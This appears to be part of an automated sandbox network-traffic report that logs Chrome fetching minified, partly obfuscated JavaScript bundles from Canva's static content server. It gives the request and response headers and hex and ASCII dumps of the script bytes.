                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 75 66 66 65 72 2e 70 75 73 68 28 62 29 2c 74 68 69 73 2e 62 75 66 66 65 72 2e 6c 65 6e 67 74 68 3e 3d 74 68 69 73 2e 63 6f 6e 66 69 67 2e 64 67 61 26 26 74 68 69 73 2e 4f 32 28 29 29 3b 30 3c 74 68 69 73 2e 62 75 66 66 65 72 2e 6c 65 6e 67 74 68 26 26 6e 75 6c 6c 3d 3d 74 68 69 73 2e 74 69 6d 65 72 26 26 28 74 68 69 73 2e 74 69 6d 65 72 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 74 68 69 73 2e 4f 32 28 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 2e 65 67 61 29 29 7d 61 73 79 6e 63 20 66 6c 75 73 68 28 29 7b 74 68 69 73 2e 4f 32 28 29 3b 61 77 61 69 74 20 74 68 69 73 2e 67 6d 2e 66 6c 75 73 68 28 29 7d 4f 32 28 29 7b 74 72 79 7b 74 68 69 73 2e 67 6d 2e 70 72 6f 63 65 73 73 28 74 68 69 73 2e 62 75 66 66 65 72 29 7d 63 61 74 63 68 28 61 29 7b 74 68 69 73 2e
                                                                                                                                                                                                                                                                    Data Ascii: uffer.push(b),this.buffer.length>=this.config.dga&&this.O2());0<this.buffer.length&&null==this.timer&&(this.timer=setTimeout(()=>this.O2(),this.config.ega))}async flush(){this.O2();await this.gm.flush()}O2(){try{this.gm.process(this.buffer)}catch(a){this.
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC661INData Raw: 2e 6d 65 28 37 30 34 35 31 39 29 2e 74 68 65 6e 28 28 29 3d 3e 28 7b 76 6d 61 3a 5f 5f 63 2e 61 4b 63 7d 29 29 3b 53 35 28 63 2c 6d 3d 3e 6e 65 77 20 6c 28 62 2c 6d 29 29 7d 53 35 28 63 2c 6c 3d 3e 6e 65 77 20 6e 4b 63 28 6c 29 29 3b 69 66 28 22 43 4f 4e 53 4f 4c 45 22 3d 3d 3d 61 2e 72 64 29 72 65 74 75 72 6e 20 63 2e 62 75 69 6c 64 28 6e 65 77 20 6a 4b 63 29 3b 63 6f 6e 73 74 20 64 3d 69 4b 63 28 7b 75 72 6c 3a 61 2e 65 6e 64 70 6f 69 6e 74 2c 76 7a 62 3a 31 45 34 7d 29 2c 65 3d 67 4b 63 28 7b 75 72 6c 3a 61 2e 65 6e 64 70 6f 69 6e 74 2c 0a 6e 61 76 69 67 61 74 6f 72 7d 29 2c 66 3d 61 73 79 6e 63 20 6c 3d 3e 7b 74 72 79 7b 61 77 61 69 74 20 65 28 6c 29 7d 63 61 74 63 68 28 6d 29 7b 72 65 74 75 72 6e 20 6d 20 69 6e 73 74 61 6e 63 65 6f 66 20 54 35 3f 62
                                                                                                                                                                                                                                                                    Data Ascii: .me(704519).then(()=>({vma:__c.aKc}));S5(c,m=>new l(b,m))}S5(c,l=>new nKc(l));if("CONSOLE"===a.rd)return c.build(new jKc);const d=iKc({url:a.endpoint,vzb:1E4}),e=gKc({url:a.endpoint,navigator}),f=async l=>{try{await e(l)}catch(m){return m instanceof T5?b


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    43192.168.2.1249766104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC794OUTGET /web/90a9bc138217d6b7.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1191INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:38 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 79912
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e595100ca3c42b8-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 568097
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "451f69d7c6a992ff4c166bd5ad4c1540"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:24 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 14 Nov 2024 00:48:59 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 15 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 9lvTeIt44JjoiEg/3XicZOO5q2N92KpBOj7HLoeCxT00eHQ+7Ljib5WpirDCMCaCG3Zld6CipSU=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: VN0MNQN2R15DTA34
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: C3234CVkFH3TyddnM1iwkqN.nqg9Dxqb
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC348INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 6f 63 79 70 6e 52 75 6c 54 52 43 41 69 4e 55 79 6d 4b 65 42 65 68 45 33 35 74 78 32 41 4c 32 59 45 38 78 50 31 56 5a 69 57 6e 54 41 44 70 5a 42 48 46 5a 6d 36 33 68 54 79 53 49 67 41 53 41 76 59 49 59 78 25 32 46 63 30 56 6e 49 38 6f 74 57 53 67 4c 43 6a 5a 4a 6c 42 50 33 37 32 34 50 47 25 32 46 4f 63 53 66 58 37 37 46 71 49 58 47 44 70 4d 64 6b 50 6c 79 61 6e 42 6d 63 7a 39 76 4b 61 6c 52 47 5a 32 38 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ocypnRulTRCAiNUymKeBehE35tx2AL2YE8xP1VZiWnTADpZBHFZm63hTySIgASAvYIYx%2Fc0VnI8otWSgLCjZJlBP3724PG%2FOcSfX77FqIXGDpMdkPlyanBmcz9vKalRGZ28%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 33 31 38 5d 2c 7b 37 30 30 33 35 34 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 4d 61 74 68 3b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6f 2c 75 3d 22 22 2c 63 3d 74 25 32 36 2c 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 75 2b 3d 28 65 3d 63 2c 36 35 3c 3d 28 6f 3d 28 72 3d 6e 2e 63 68 61 72 41 74 28 69 29 29 2e 63 68 61 72 43 6f 64 65 41 74 28 29 29 26 26 6f 3c 3d 39 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 28
                                                                                                                                                                                                                                                                    Data Ascii: (self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[4318],{700354:function(n,t){!function(n){var t=Math;function r(n,t){for(var r,e,o,u="",c=t%26,i=0;i<n.length;i++)u+=(e=c,65<=(o=(r=n.charAt(i)).charCodeAt())&&o<=90?String.fromCharCode((
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: a9 72 4a ca 8c c5 95 c6 93 4e 67 c7 b6 6f c6 b1 c5 85 73 c9 a7 c6 84 c6 a1 79 62 c5 b7 c6 88 c4 b2 67 68 c9 83 79 ca b8 c4 96 55 72 76 74 75 c5 b4 70 cc 88 c9 9f cb b2 71 67 c5 95 62 c7 82 c7 8d cc 8c cc 8e c5 b4 cc 98 c7 83 c4 aa cc 94 cc 96 c6 88 c9 84 c8 bb 79 cc 8b cc 8d cc 8f cc a3 c4 9e c4 8b cc a1 75 ca 90 61 ca 9c cc 86 72 ca 9f c4 8e ca a2 cc b2 c4 8c 6e ca a6 c7 95 c4 96 c9 9f 51 c7 b2 c4 93 c9 9f c9 8c c6 90 cc 93 c4 85 71 62 6a 3f 6f ca b4 71 ca b6 cc 92 c4 96 ca ba cb 8b cc bc 65 c5 84 ca bb c9 81 61 cd 90 c8 b8 62 62 cb 9f cd 8b c4 98 cb 87 62 c6 ad cd 9f c5 94 c4 8f 66 c4 85 c5 95 c4 b1 c4 a3 c4 8f c4 b2 61 32 cd aa c4 a3 c5 95 70 6f c8 b6 cd 82 c6 ad c7 95 cd a3 c5 b2 63 2c cd b8 7a 31 2c cc 80 c7 a8 cd bf 31 30 cd be 62 74 31 cd b9 cd a5
                                                                                                                                                                                                                                                                    Data Ascii: rJNgosybghyUrvtupqgbyuarnQqbj?oqeabbbfa2poc,z1,10bt1
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: c4 a9 6e 79 c4 8b c4 96 c5 ae 46 67 65 c4 b1 74 c5 ab c5 8f c4 ac c5 aa 63 6b 3f 64 68 72 65 6c 3f 74 c4 8c 42 6a 61 43 c5 8f c5 8b 65 c5 83 41 6e c5 80 c5 b9 c6 92 67 c6 97 c5 af c5 af c5 8a 72 42 73 3f 66 c4 8c c6 a2 c5 ae c5 b0 c6 a6 c6 a8 c6 a0 c6 94 c6 96 c6 98 c6 8e c5 83 c4 89 66 70 c6 82 63 c5 ae c4 96 65 68 c4 94 76 c5 80 c6 a9 c5 8b 72 70 75 46 6c c4 94 75 72 66 76 c5 b9 41 c5 af 76 73 76 70 c5 9d 76 c4 9f 3f 43 c6 8e 7a c7 8e c7 8d c4 9f c5 b9 53 c6 bf c5 a9 c7 97 61 3f c6 9c c5 97 74 c5 9d c5 90 c5 b2 71 71 52 c4 b7 c4 a2 c7 8e c4 8d 61 c6 8e c5 b2 67 67 c4 81 75 c7 af c4 a1 c5 aa c4 a6 c7 b8 c7 86 c7 bb c4 94 3f 65 72 7a 62 c4 b7 c8 81 67 59 c7 b2 c4 a1 c7 b5 c7 98 c4 a6 c5 97 c4 91 c5 86 72 c8 91 72 5a c8 85 c5 90 c6 90 c4 ad c5 9d 73 c5 90
                                                                                                                                                                                                                                                                    Data Ascii: nyFgetck?dhrel?tBjaCeAngrBs?ffpcehvrpuFlurfvAvsvpv?CzSa?tqqRaggu?erzbgYrrZs
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 98 d3 99 d3 9b d2 8b c5 b9 cf 81 c6 a9 c6 b9 76 c6 bb 5f 73 c7 a5 c6 b8 c6 ba 67 d3 a7 c7 a2 c6 a9 d1 9e d1 98 d1 a1 d1 9d c4 8b d3 b1 7a 5f ca 84 52 5f c5 a5 c4 aa d1 8d c4 96 d1 9d cc 81 c4 94 d1 a1 66 d1 a4 c4 8e 6a c7 92 67 d1 a3 c4 a5 c7 b5 c6 bf 6a c4 b3 cc 8e c4 a8 c9 b6 c4 86 3f 50 c8 ba ce ab cb 89 ca 9c c9 b1 d1 bf c9 80 c5 80 c4 8b c7 98 51 c8 b4 78 d4 9f c4 82 cd b2 c7 99 d2 95 c4 81 6c 21 c4 80 71 c6 92 c4 96 c6 97 c4 b6 d4 a7 21 43 ca 97 66 d1 a1 c7 90 46 d3 a4 c6 bb 3f 57 d1 a3 c4 8a cd a8 ca 99 cc 8e c4 8d d1 8e d1 89 c6 81 ca ab c9 80 66 4e c7 b7 c6 82 c9 bf c4 af c5 9d c6 81 76 d5 8b cd 8f cb 9d 6b 47 cc b0 75 d4 b2 c4 b1 d1 ba c4 97 d5 95 c8 89 cd 8c d5 95 cc b2 c6 9a c4 b0 61 ca 99 c5 aa c4 a1 c5 b6 c6 8e cd 95 c4 89 c8 95 c5 b9 c5 80
                                                                                                                                                                                                                                                                    Data Ascii: v_sgz_R_fjgj?PQxl!q!CfF?WfNvkGua
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: d3 8d 21 d5 bf d3 aa 72 c4 a1 d4 94 ce aa cb 97 28 32 cf 95 2c df b8 36 29 2e c6 a0 d2 80 d1 8a 28 22 cf a2 79 22 29 3b c7 92 28 74 de 93 de 95 d7 84 3d 74 df be c4 8c 52 d1 8a c4 a1 c8 af 28 6e 2b 22 cf b1 cb b1 c9 bb cf b5 c8 a1 cf b8 65 cf ba 61 c8 9d e0 a0 86 3b 66 26 26 28 61 dd 86 e0 a0 8f e0 a0 91 c6 a1 d0 b4 cd a7 c6 8e 28 66 5b 65 e0 a0 99 5f 49 52 41 51 42 45 5f 22 2b 6e 5d 29 dd 9c 2e de 9f e0 a0 90 c6 a0 43 e0 a0 b0 cd 9b 65 e0 a0 b3 e0 a0 b5 e0 a0 b7 45 e0 a0 ba 51 52 e0 a1 91 e0 a0 be e0 a1 80 e0 a1 82 29 29 7d 7d c7 95 67 c7 86 de 92 7b 7d d8 bf ca 9f de 8b c9 ab e0 a0 aa e0 a1 9a e0 a1 9d e0 a1 9f 72 de 93 e0 a1 a3 c8 97 d2 ae e0 a1 a6 7b d0 b6 72 7d e0 a1 9a df a7 3f d4 97 6f 48 45 59 d7 b5 c9 84 d7 bf d7 9a 6c c4 8c d7 84 cc 94 dd bd cd
                                                                                                                                                                                                                                                                    Data Ascii: !r(2,6).("y");(t=tR(n+"ea;f&&(a(f[e_IRAQBE_"+n]).CeEQR))}}g{}r{r}?oHEYl
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: a4 a0 c5 af c7 b5 2e 4d 76 e0 aa 9e 71 e0 aa 9e 5f 55 e0 a8 b7 e0 aa a4 37 cf 89 6b 39 30 e0 aa b1 51 46 5f 31 e0 aa 83 e0 a9 90 ca 99 c4 9a cb 97 d2 9e 5b 71 cb 95 e0 a9 91 e0 a5 81 cf a9 c5 98 de 98 c4 8b d4 8a 65 cb 80 c9 81 22 c5 a3 e0 a8 b8 c5 af cd a6 e0 a7 9b e0 aa bd d1 80 c7 8d c8 bb c4 8b ce a1 e0 a2 b5 e0 a9 9b 6c e0 aa ac e0 a9 81 c4 84 e0 aa ac 5f e0 a9 ab 5f c5 ae e0 a8 b6 e0 a9 a9 c4 ac e0 aa ac e0 a8 b7 7a c9 bc e0 aa ad c7 92 e0 a4 b8 e0 aa bc e0 aa 9b 71 e0 ab 9c c4 a5 32 e0 aa bc e0 aa 84 c5 ac cd 84 e0 a8 b7 d5 8b c5 ae 61 5f d4 83 c9 84 e0 aa 83 cb b6 d4 bf d1 ae ca 9c d0 b0 e0 a2 b1 e0 a9 b0 ca 9c 5f cc 9c c9 b1 e0 a8 b7 43 c8 b7 cc 9c 70 c5 98 d4 8a e0 aa 83 e0 ac 8f c9 a1 c7 94 e0 ac 93 e0 a7 b5 df 82 e0 ac 90 e0 ac 98 e0 ab 84 d1
                                                                                                                                                                                                                                                                    Data Ascii: .Mvq_U7k90QF_1[qe"l__zq2a__Cp
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 2c 6a 2c 48 2c 44 2c 54 2c 45 2c 4f 2c 46 2c 49 2c 4e 2c 7a 2c 50 2c 5a 2c 4d 2c 55 2c 4a 2c 56 2c 42 2c 4c 2c 51 2c 57 2c 59 3d 69 28 30 29 2c 58 3d 69 28 31 29 2c 4b 3d 69 28 32 29 2c 24 3d 69 28 33 29 2c 6e 6e 3d 69 28 34 29 2c 74 6e 3d 5b 59 2c 58 2c 22 38 22 2c 22 34 36 22 5d 2c 72 6e 3d 74 6e 2e 63 6f 6e 63 61 74 28 5b 4b 2c 24 2c 6e 6e 2c 22 33 32 22 2c 22 31 33 22 2c 22 31 30 22 5d 29 2c 65 6e 3d 69 28 35 29 2c 6f 6e 3d 69 28 36 29 2c 75 6e 3d 69 28 37 29 2c 63 6e 3d 69 28 38 29 2c 61 6e 3d 69 28 39 29 2c 66 6e 3d 69 28 31 30 29 2c 73 6e 3d 69 28 31 31 29 2c 6c 6e 3d 69 28 31 32 29 2c 68 6e 3d 69 28 31 33 29 2c 76 6e 3d 69 28 31 34 29 2c 70 6e 3d 69 28 31 35 29 2c 67 6e 3d 69 28 31 36 29 2c 64 6e 3d 69 28 31 37 29 2c 79 6e 3d 69 28 31 38 29 2c 6d
                                                                                                                                                                                                                                                                    Data Ascii: ,j,H,D,T,E,O,F,I,N,z,P,Z,M,U,J,V,B,L,Q,W,Y=i(0),X=i(1),K=i(2),$=i(3),nn=i(4),tn=[Y,X,"8","46"],rn=tn.concat([K,$,nn,"32","13","10"]),en=i(5),on=i(6),un=i(7),cn=i(8),an=i(9),fn=i(10),sn=i(11),ln=i(12),hn=i(13),vn=i(14),pn=i(15),gn=i(16),dn=i(17),yn=i(18),m
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 63 72 65 65 6e 7d 2c 61 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 6c 6f 63 61 74 69 6f 6e 7d 2c 66 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 63 74 28 6e 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 7d 2c 73 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 63 74 28 6e 29 2e 62 6f 64 79 7d 2c 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 74 2c 72 29 7d 2c 68 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 69 66 28 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 29 72 65 74 75 72 6e 20 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 7d 2c 76 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 6e 26 26 6e 2e 61 70 70 65 6e
                                                                                                                                                                                                                                                                    Data Ascii: creen},at=function(n){return n.location},ft=function(n){return ct(n).documentElement},st=function(n){return ct(n).body},lt=function(n,t,r){return n.setAttribute(t,r)},ht=function(n,t){if(n.getAttribute)return n.getAttribute(t)},vt=function(n,t){n&&n.appen
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 52 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 22 76 61 6c 75 65 73 22 69 6e 20 49 6e 29 72 65 74 75 72 6e 20 49 6e 2e 76 61 6c 75 65 73 28 6e 29 3b 76 61 72 20 74 2c 72 3d 5b 5d 3b 66 6f 72 28 74 20 69 6e 20 6e 29 4b 6e 28 6e 2c 74 29 26 26 72 2e 70 75 73 68 28 6e 5b 74 5d 29 3b 72 65 74 75 72 6e 20 72 7d 2c 6a 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 22 6b 65 79 73 22 69 6e 20 49 6e 29 72 65 74 75 72 6e 20 49 6e 2e 6b 65 79 73 28 6e 29 3b 76 61 72 20 74 2c 72 3d 5b 5d 3b 66 6f 72 28 74 20 69 6e 20 6e 29 4b 6e 28 6e 2c 74 29 26 26 72 2e 70 75 73 68 28 74 29 3b 72 65 74 75 72 6e 20 72 7d 2c 48 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 66 6f 72 28 76 61 72 20 65 3d 72 2c 6f 3d 30 2c 75 3d 30 2c 63 3d 6e 3b 75 3c 63 2e 6c 65 6e
                                                                                                                                                                                                                                                                    Data Ascii: Rt=function(n){if("values"in In)return In.values(n);var t,r=[];for(t in n)Kn(n,t)&&r.push(n[t]);return r},jt=function(n){if("keys"in In)return In.keys(n);var t,r=[];for(t in n)Kn(n,t)&&r.push(t);return r},Ht=function(n,t,r){for(var e=r,o=0,u=0,c=n;u<c.len


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    44192.168.2.1249767104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC787OUTGET /web/f5352d9ab53b693f.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:39 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 2229
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e595109692b435b-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49979
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "b852c7982f102b1fa252fc1a2e5f1356"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:25 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:24 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: iqJzqyPv7nFhymDlIWm4G6mpPTc0aaTycrI4GeaxScDtkmeT1PHfzorsFgF5LsZgfr4ejgoY9j0=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8X0KQHMSY06M04
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: bgiMqc3rmR1SxA47lEXlkIBhOoRP4Jtx
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC354INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 49 41 37 4d 6c 76 5a 59 59 49 45 51 4c 64 34 50 7a 42 72 36 39 25 32 46 49 50 25 32 46 50 36 78 73 74 6b 58 63 35 6d 6e 6d 25 32 46 43 4f 39 58 34 52 65 36 42 4e 36 42 6f 69 25 32 46 55 6c 71 64 39 6d 5a 61 74 39 25 32 42 33 42 73 38 48 32 53 46 67 35 73 5a 73 59 59 6f 46 4d 7a 50 64 6c 65 4b 55 4e 69 32 5a 66 66 39 6b 4f 66 42 62 52 71 32 66 71 62 47 45 32 48 69 6c 56 53 41 45 74 42 76 78 69 37 76 50 76 6f 38 55 39 38 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IA7MlvZYYIEQLd4PzBr69%2FIP%2FP6xstkXc5mnm%2FCO9X4Re6BN6Boi%2FUlqd9mZat9%2B3Bs8H2SFg5sZsYYoFMzPdleKUNi2Zff9kOfBbRq2fqbGE2HilVSAEtBvxi7vPvo8U98%3D"}],"group":"cf-nel","max_age":60
